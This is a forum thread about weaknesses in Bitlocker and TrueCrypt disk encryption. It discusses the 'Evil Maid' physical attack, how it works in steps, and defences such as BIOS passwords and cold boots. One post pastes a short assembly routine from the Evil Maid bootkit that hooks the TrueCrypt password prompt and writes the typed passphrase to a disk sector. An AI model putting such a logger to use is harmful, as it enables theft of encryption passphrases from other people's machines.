Advertisement
If you have a new account but are having problems posting or verifying your account, please email us on hello@boards.ie for help. Thanks :)
Hello all! Please ensure that you are posting a new thread or question in the appropriate forum. The Feedback forum is overwhelmed with questions that are having to be moved elsewhere. If you need help to verify your account contact hello@boards.ie
Hi there,
There is an issue with role permissions that is being worked on at the moment.
If you are having trouble with access or permissions on regional forums please post here to get access: https://www.boards.ie/discussion/2058365403/you-do-not-have-permission-for-that#latest

Vista and Win7 Bitlocker Busted (its official)

Comments

  • #2
    mehmeh12
    Closed Accounts Posts: 921 ✭✭✭mehmeh12


    Would this work of files encrypted with Truecrypt?


  • #3
    BaconZombie
    Registered Users, Registered Users 2 Posts: 8,813 ✭✭✭BaconZombie


    No but the "Evil Maid Attack" does....


    I recently posted "Protect the Data" from Whom?. I wrote:

    [P]rivate citizens (and most organizations who are not nation-state actors) do not have a chance to win against a sufficiently motivated and resourced high-end threat.

    Joanna Rutkowska provides a great example of the importance of knowing the adversary in her post Evil Maid goes after TrueCrypt!, a follow-up to her January post Why do I miss Microsoft BitLocker?

    Her post describes how she and Alex Tereshkin implemented a physical attack against laptops with TrueCrypt full disk encryption. They implemented the attack (called "Evil Maid") as a bootable USB image that an intruder would use to boot a target laptop. Evil Maid hooks the TrueCrypt function that asks the user for a passphrase on boot, then stores the passphrase for later physical retrieval.

    The scenario is this:


    1. User leaves laptop alone in hotel room.

    2. Attacker enters room, boots laptop with Evil Maid, and compromises TrueCrypt loader. Attacker leaves.

    3. User returns to hotel room, boots laptop, enters TrueCrypt passphrase. Game over.

    4. User leaves laptop alone in hotel room again.

    5. Attacker enters room again, boots laptop with Evil Maid again, and retrieves passphrase.
    http://taosecurity.blogspot.com/2009/10/protect-data-from-evil-maid.html
    mehmeh12 wrote: »
    Would this work of files encrypted with Truecrypt?


  • #4
    mehmeh12
    Closed Accounts Posts: 921 ✭✭✭mehmeh12


    Ok but in this case direct physical access is required to tamper with truecrypt-after being loaded on to the drive would the antivirus software not detect evil maid and quarantine?


  • #5
    Eddiethehill
    Closed Accounts Posts: 35 Eddiethehill


    The Evil Maid at least takes two visits to the machine to work. First to infect the hard disk, and again to recover the password or just steal/sieze the computer.

    This bitlocker attack just needs to get hold of the machine(I think from what I have read).

    The bad news for us all is if the software exists to do this(Passware v9.5) then anybody who wants it can get it easily via purchase or Bittorrent download and they are ready open up any bitlocker protected machine.

    Bitlocker is advertised by Microsoft as a way of keeping your files secure. Not so any more, and this fact should be publicised.

    The Evil Maid could be kept at bay by setting the BIOS as password protected and the machine not bootable by any means other than the hard disk. Hopefully there is no backdoor BIOS password. Maybe epoxy up the USB slot(s) and CD player. Maybe epoxy in the hard drive to prevent tampering. The paranoia mounts - but if the machine is stolen without an EM attack beforehand then the data is secure.

    That seems to be the situaton at the moment.

    As for myself, I will convert back to using truecrypt until I learn more.

    Is Mise...


  • #6
    Eddiethehill
    Closed Accounts Posts: 35 Eddiethehill


    Now it gets worse - An Evil Maid style attack against Bitlocker even if the PC has a TPM chip.

    http://testlab.sit.fraunhofer.de/content/output/project_results/bitlocker_skimming/

    The video shows how easy it is to infect a laptop in a few seconds. It would not show up as a bootkit either.

    Looks like that unless you can keep them under control all the time, laptops are useless for keeping confidential information - no matter what you do.

    Sigh!


  • Advertisement
  • #7
    limewax
    Closed Accounts Posts: 4 limewax


    "evil maid" attack... :rolleyes:

    [PHP]
    cpu 686
    use16
    segment .text

    GLOBAL Logger
    GLOBAL g_uLoggerCodeSize
    GLOBAL g_uCallAskPasswordDeltaOffset

    %define TC_BIOS_KEY_ENTER 1ch
    Logger: push bp
    mov bp, sp
    push word [bp+4]
    CallAskPassword:
    call $+3 ; will be patched to "call AskPassword"
    add sp, 2
    cmp al, TC_BIOS_KEY_ENTER
    jnz .exit
    ;typedef struct
    ;{
    ; unsigned __int32 Length;
    ; unsigned char Text[MAX_PASSWORD + 1];
    ; char Pad[3]; // keep 64-bit alignment
    ;} Password;
    push ax
    push es
    push ds
    pop es

    mov ax, 0301h ; write one sector
    mov cx, 62 ; number #61, disk offset 0x7a00
    mov dx, 0080h
    mov bx, word [bp+4] ; arg0
    int 13h
    pop es
    pop ax
    .exit: pop bp
    ret ; cdecl
    g_uLoggerCodeSize dw $-Logger
    g_uCallAskPasswordDeltaOffset dw CallAskPassword-Logger+1
    [/PHP]

    gee, that looks complicated :P
    *yawn*


  • #8
    Capt'n Midnight
    Moderators, Recreation & Hobbies Moderators, Science, Health & Environment Moderators, Technology & Internet Moderators Posts: 93,593 Mod ✭✭✭✭Capt'n Midnight


    unfortunatly it's possible to put malware into BIOS's :( so not much you can do there

    Other wise always do a cold boot (battery out, battery in sort of thing) set the laptop to do a full boot each time to wipe the RAM on startup.

    It's always best to have to layers of encryption if you are really serious about it , protects from stupid flaws in one system and to a certain extent from script kiddies

    perhaps you could boot from a CD and checksums on the BIOS / start of HDD / RAM to verify they are untouched ?


    But it's the old story of physical access, if someone has unrestricted access to the machine they probably own it.


  • #9
    BostonB
    Closed Accounts Posts: 18,056 ✭✭✭✭BostonB


    If the laptop or external disk is stolen though, the password will never be entered so its secure from that point of view no?


  • #10
    Eddiethehill
    Closed Accounts Posts: 35 Eddiethehill


    BostonB wrote: »
    If the laptop or external disk is stolen though, the password will never be entered so its secure from that point of view no?

    Yes. A PC protected by full disk encryption which is stolen is considered safe. All the data on the hard disk, apart from the Master Boot Record (MBR) is encrypted so cannot be read.

    The Evil Maid attack is a way for a determined agent or agency (think industrial espionage, private detective, military etc.) to get you to enter the password into a PC AFTER it is infected, then steal/sieze it.

    An opportunist thief just grabbing a PC and making away with it just gets the PC that cannot be booted up or read.

    The trouble is that if you are in posession of information on your laptop which has a big monetary/intelligence value, there will someone looking to get their hands on it. The Evil Maid attacker takes little risk and could reap a big reward if successful.


  • #11
    BostonB
    Closed Accounts Posts: 18,056 ✭✭✭✭BostonB


    I would have thought all of this industrial espionage was quite rare. But one place I worked a good few years back. Someone pulled a mail server from the rack in a room with maybe 50 servers, and got it out of the building. Obviously some insider help required. But it opened my eyes.


  • Advertisement
Advertisement